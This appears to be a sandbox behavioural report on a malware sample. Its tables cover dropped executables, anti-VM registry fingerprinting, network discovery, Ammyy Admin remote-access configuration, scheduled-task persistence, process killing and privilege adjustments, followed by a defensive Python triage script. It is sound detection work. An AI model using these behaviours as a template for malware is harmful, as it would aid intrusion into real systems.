Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1719112073.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\builder.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\sysnldcvmr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\m.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2472628288.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2802026625.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\SteamDetector.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\188477111.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2009521560.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\333.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\key.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

System Network Connections Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters\TSRedirFlags C:\Windows\system32\mstsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key security queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\mstsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\TSRedirFlags C:\Windows\system32\mstsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\Device Parameters C:\Windows\system32\mstsc.exe N/A
Key security queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters C:\Windows\system32\mstsc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\Device Parameters C:\Windows\system32\mstsc.exe N/A

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr3 = eff8d4e8d40cfce88522ade2145f6c05662b27ed79491d67b694f14440a439d7cd741642d3ff1085374c125e8329dd57233d521631fe83dade1a01d333cb136313584ec7ab76cc0a5913ff C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
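Two things in the registry tables above deserve a second look. The SCSI and BIOS rows are attributed to dwm.exe, taskmgr.exe and mstsc.exe, Windows components rather than the dropped files, so in this run the signature documents what the guest exposes (a QEMU DVD-ROM next to a WDC-branded disk) more than a payload's own anti-VM logic; a sample issuing the same query would see the QEMU string. The HKEY_USERS rows are the stronger signal: Aa_v3.exe writes its Ammyy Admin settings under HKU\.DEFAULT, the hive loaded for the LocalSystem account, while the ZoneMap and SystemCertificates keys are routine WinINet and CryptoAPI initialisation. The Python below is an added example, not part of the sandbox report: it parses rows in the shape of these tables, tags hypervisor fingerprints by SCSI vendor ID, separates Windows components from dropped files, and singles out the Ammyy configuration writes from the noise. The sample rows are a constructed subset of the report (the hr3 blob is shortened), and the vendor list, tag names and origin heuristic are this example's own.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the registry rows in the tables above
# (a subset of this report's rows; the hr3 blob is shortened for readability).
SAMPLE_ROWS = r"""
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters\TSRedirFlags C:\Windows\system32\mstsc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr3 = eff8d4e8d40cfce8 C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
""".strip().splitlines()

# One row: <action> <registry path>[ = "value"] <process image> N/A
ROW_RE = re.compile(
    r"^(?P<action>Key opened|Key value queried|Key security queried|Key created|"
    r"Set value \((?:int|data|str)\))\s+"
    r"(?P<path>\\REGISTRY\\.*?)\s+"
    r"(?P<process>C:\\\S+)\s+N/A$"
)

# SCSI vendor IDs that reveal a hypervisor (example's own list); WDC is a real disk vendor.
HYPERVISOR_VENDORS = {"QEMU", "VBOX", "VMWARE", "XEN", "MSFT"}


def parse_row(line):
    """Split a table row into action, key path, optional value and process."""
    m = ROW_RE.match(line)
    if not m:
        return None
    path, _, value = m.group("path").partition(" = ")
    return {"action": m.group("action"), "path": path,
            "value": value.strip('"'), "process": m.group("process")}


def process_origin(process):
    """Heuristic: dropped payload vs. Windows component, by image location."""
    p = process.lower()
    if "\\appdata\\local\\temp\\" in p:
        return "dropped"
    if p.startswith("c:\\windows\\"):
        return "windows_component"
    return "other"


def classify(event):
    """Tag one registry event with what it tells the analyst."""
    path = event["path"].upper()
    tags = []
    if "\\ENUM\\SCSI\\" in path:
        tags.append("scsi_enum")
        m = re.search(r"VEN_([A-Z0-9_]+)&PROD_", path)
        if m and m.group(1) in HYPERVISOR_VENDORS:
            tags.append("hypervisor_fingerprint:" + m.group(1))
    if "\\HARDWARE\\DESCRIPTION\\SYSTEM\\BIOS" in path:
        tags.append("bios_fingerprint")
    if path.startswith("\\REGISTRY\\USER\\.DEFAULT\\"):
        tags.append("localsystem_profile")          # HKU\.DEFAULT = LocalSystem's hive
        if "\\SOFTWARE\\AMMYY\\ADMIN" in path:
            tags.append("ammyy_config")
        elif "INTERNET SETTINGS\\ZONEMAP" in path or "\\SYSTEMCERTIFICATES" in path:
            tags.append("wininet_crypto_noise")      # routine WinINet / CryptoAPI init
    return tags


def triage(lines):
    """Summarise a block of rows: who read hypervisor strings, who wrote Ammyy config."""
    summary = {"hypervisor_reads": [], "ammyy_writers": set(),
               "noise_rows": 0, "unparsed": 0, "by_process": defaultdict(list)}
    for line in lines:
        ev = parse_row(line)
        if ev is None:
            summary["unparsed"] += 1
            continue
        tags = classify(ev)
        origin = process_origin(ev["process"])
        summary["by_process"][ev["process"]].extend(tags)
        for t in tags:
            if t.startswith("hypervisor_fingerprint:"):
                summary["hypervisor_reads"].append((ev["process"], origin, t.split(":", 1)[1]))
        if "ammyy_config" in tags:
            summary["ammyy_writers"].add(ev["process"])
        if "wininet_crypto_noise" in tags:
            summary["noise_rows"] += 1
    return summary


if __name__ == "__main__":
    for key, val in triage(SAMPLE_ROWS).items():
        print(key, dict(val) if isinstance(val, defaultdict) else val)
```

Run against the full tables, the origin column is what matters: a hypervisor_fingerprint read by a dropped file is an anti-VM check worth pulling apart in the sample; the same read by dwm.exe or mstsc.exe is the guest's hardware showing through.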

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\system32\mstsc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\SteamDetector.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1392523614.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
